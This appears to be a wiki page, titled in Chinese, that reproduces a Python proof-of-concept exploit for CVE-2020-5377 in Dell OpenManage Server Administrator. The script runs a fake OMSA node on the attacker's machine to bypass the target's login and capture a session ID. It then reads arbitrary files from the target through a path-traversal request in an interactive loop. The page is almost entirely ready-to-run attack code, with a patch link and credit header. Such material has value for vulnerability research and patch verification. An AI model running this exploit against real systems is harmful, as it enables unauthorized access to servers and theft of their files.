CVE-2020-5377_戴爾OMSA文件讀取漏洞

# CVE-2020-5377 戴爾OMSA文件讀取漏洞
==POC==

# This is a proof of concept for CVE-2020-5377, an arbitrary file read in Dell OpenManage Administrator
# Proof of concept written by: David Yesland @daveysec with Rhino Security Labs
# More information can be found here: 
# A patch for this issue can be found here: 
# https://www.dell.com/support/article/en-us/sln322304/dsa-2020-172-dell-emc-openmanage-server-administrator-omsa-path-traversal-vulnerability

from xml.sax.saxutils import escape
import BaseHTTPServer
import requests
import thread
import ssl
import sys
import re
import os

import urllib3
urllib3.disable_warnings()

if len(sys.argv) < 3:
	print 'Usage python auth_bypass.py  :'
	exit()

#This XML to imitate a Dell OMSA remote system comes from https://www.exploit-db.com/exploits/39909
#Also check out https://github.com/hantwister/FakeDellOM
class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
	def do_POST(s):
		data = ''
		content_len = int(s.headers.getheader('content-length', 0))
		post_body = s.rfile.read(content_len)
		s.send_response(200)
		s.send_header("Content-type", "application/soap+xml;charset=UTF-8")
		s.end_headers()
		if "__00omacmd=getuserrightsonly" in post_body:
			data = escape("0458759")
		if "__00omacmd=getaboutinfo " in post_body:
			data = escape("6.0.3")
		if data:
			requid = re.findall('>uuid:(.*?)<',post_body)[0]
			s.wfile.write('''
							
							  
							    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
							    uuid:'''+requid+'''
							    0d70cce2-05b9-45bb-b219-4fb81efba639
							  
							  
							    
							      0
							      '''+data+'''
							    
							  
							''')

		else:
			s.wfile.write('''http://schemas.dmtf.org/wbem/wsman/1/wsman.xsdFake Dell Open Manage Server Node1.0''')

	def log_message(self, format, *args):
		return

createdCert = False
if not os.path.isfile('./server.pem'):
	print '[-] No server.pem certifcate file found. Generating one...'
	os.system('openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes -subj "/C=NO/ST=NONE/L=NONE/O=NONE/OU=NONE/CN=NONE.com"')
	createdCert = True

def startServer():
	server_class = BaseHTTPServer.HTTPServer
	httpd = httpd = server_class(('0.0.0.0', 443), MyHandler)
	httpd.socket = ssl.wrap_socket (httpd.socket, certfile='./server.pem', server_side=True)
	httpd.serve_forever()

thread.start_new_thread(startServer,())

myIP = sys.argv[1]
target = sys.argv[2]

def bypassAuth():
	values = {}
	url = "https://{}/LoginServlet?flag=true&managedws=false".format(target)
	data = {"manuallogin": "true", "targetmachine": myIP, "user": "VULNERABILITY:CVE-2020-5377", "password": "plz", "application": "omsa", "ignorecertificate": "1"}
	r = requests.post(url, data=data, verify=False, allow_redirects=False)
	cookieheader = r.headers['Set-Cookie']
	sessionid = re.findall('JSESSIONID=(.*?);',cookieheader)
	pathid = re.findall('Path=/(.*?);',cookieheader)
	values['sessionid'] = sessionid[0]
	values['pathid'] = pathid[0]
	return values

ids = bypassAuth()
sessionid = ids['sessionid']
pathid = ids['pathid']

print "Session: "+sessionid
print "VID: "+pathid

def readFile(target,sessid,pathid):
    while True:
        file = raw_input('file > ')
        url = "https://{}/{}/DownloadServlet?help=Certificate&app=oma&vid={}&file={}".format(target,pathid,pathid,file)
        cookies = {"JSESSIONID": sessid}
        r = requests.get(url, cookies=cookies, verify=False)
        print 'Reading contents of {}:\n{}'.format(file,r.content)

def getPath(path):
	if path.lower().startswith('c:\\'):
		path = path[2:]
        path = path.replace('\\','/')
        return path

readFile(target,sessionid,pathid)

==GIF==
[[File:OpenManage.gif]]